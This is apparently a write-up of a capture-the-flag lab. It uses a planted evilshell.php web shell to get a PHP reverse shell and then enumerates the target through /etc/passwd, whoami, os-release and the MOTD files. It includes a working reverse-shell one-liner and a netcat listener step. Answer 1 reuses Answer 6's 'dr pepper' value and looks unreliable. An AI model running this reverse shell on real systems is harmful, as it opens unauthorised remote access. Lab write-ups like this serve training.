#1 First, we run the machine we will use.
#2 One minute later when the connection is established we launch our configuration file that we downloaded earlier. As shown below!
Note: you can click here to download your own configuration file.
#3 After the machine starts, we add the evilshell.php extension to the end of the given IP address and type it into the search engine and press enter.
Then we encounter a vulnerable site.We can enter commands using the interface provided on this site.
However, since it is a vulnerable site, it will be more useful to proceed on our own kali machine by applying a reverse shell. But, do not forget that you can also apply commands through the site interface.
#4 Now we listen on port 1414 using netcat
Then, while listening to the port, we write the php reverse shell code to the site we have and press enter.
php -r ‘$sock=fsockopen(“your_ip_address”,port_number);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Don’t forget to set the ip address and port according to you in the php code above.
After getting a reverse shell, we can start solving the questions.
#Answer 1
What strange text file is in the website root directory?
We see the answer to this question as dr pepper by entering the ls command.
#Answer 2
How many non-root/non-service/non-daemon users are there?
For this question, we need to open the passwd file in the /etc folder. Because user or service information is kept in this directory.
As a result we did not encounter any data that is not non-root/non-service/non-daemon. The answer is 0.
#Answer 3
What user is this app running as?
It is enough to do a whoami query to find the user the application is running. So we see that the answer is www-data.
#Answer 4
What is the user’s shell set as?
To find out how the user’s shell is set, we use the /etc/passwd command we wrote in the previous questions. From what we have we see that www-data is set to /usr/sbin/nologin. So the answer is /usr/sbin/nologin.
#Answer 5
What version of Ubuntu is running?
To find the running version of ubuntu, we can open the os-release file in the /etc folder and find general information about ubuntu.According to the information in the file, the version of ubuntu is 18.04.4.
So we can say that the answer is 18.04.4
#Answer 6
Print out the MOTD. What favorite beverage is shown?
When we read the /etc folder for the print motd statement given in the question, we find a file called update-motd.d in it.
When we open this file, the file named 00-header attracts our attention because there was 00-header in the hint next to the question.
When we read the file named 00-header, we find the answer to our question in it. Our answer is dr pepper.
So we answered all the questions.
In this exercise, we have understood a little how important the /etc folder is.
